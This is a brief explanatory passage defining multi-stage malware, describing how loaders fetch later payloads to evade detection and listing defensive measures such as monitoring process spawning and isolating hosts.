Multi-stage malware is malicious code that delivers its capabilities in separate steps instead of all at once. The first component is often a small loader or dropper whose job is to fetch, decrypt, or launch later payloads. Those later stages may add persistence, steal data, enable remote control, or load additional modules in memory.
This design matters because each step can reduce detection. A lightweight first stage may look harmless, avoid antivirus signatures, or delay suspicious behavior until after initial checks. In real attacks, defenders may see a benign-looking installer, followed by unusual network traffic, new processes, or in-memory execution. Good defenses focus on the whole chain: inspect downloaders, monitor process spawning and persistence changes, and isolate hosts after a suspicious launch. Multi-stage malware is common in campaigns that want flexibility, stealth, and the ability to swap payloads without changing the initial infection method.